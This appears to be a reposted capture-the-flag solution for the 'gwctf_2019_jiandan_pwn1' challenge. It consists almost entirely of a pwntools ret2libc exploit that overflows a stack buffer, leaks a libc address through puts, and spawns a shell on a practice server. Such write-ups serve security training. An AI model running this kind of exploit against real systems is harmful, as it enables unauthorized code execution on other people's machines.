其他分享
首页 > 其他分享> > 040-gwctf_2019_jiandan_pwn1

040-gwctf_2019_jiandan_pwn1

作者:互联网

EXP

from pwn import *                                                           
from LibcSearcher import *                             
context(log_level = 'debug',os = 'linux',arch = 'amd64')

#sh = process('./040-gwctf_2019_jiandan_pwn1')                                      
sh = remote('node4.buuoj.cn', 27858)
elf = ELF('./040-gwctf_2019_jiandan_pwn1')

pop_rdi = 0x400843
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.symbols['main']

payload1 = flat(b'A'*0x10c, b'\x18', pop_rdi, puts_got, puts_plt, main_addr)
sh.sendlineafter('fun!\n', payload1)

puts_addr = u64(sh.recvuntil('\n')[:-1].ljust(8, b'\x00'))
print('[+]puts_addr: ', hex(puts_addr))

ls = LibcSearcher('puts', puts_addr)
system_addr = puts_addr - ls.dump('puts') + ls.dump('system')
binsh_addr = puts_addr - ls.dump('puts') + ls.dump('str_bin_sh')
print('[+]system_addr: ', hex(system_addr))
print('[+]binsh_addr: ', hex(binsh_addr))

payload2 = flat(b'A'*0x10c, b'\x18', pop_rdi, binsh_addr, system_addr)
sh.sendlineafter('fun!\n', payload2)
sh.interactive()

标签:binsh,addr,puts,system,gwctf,sh,2019,ls,jiandan
来源: https://www.cnblogs.com/labster/p/15060498.html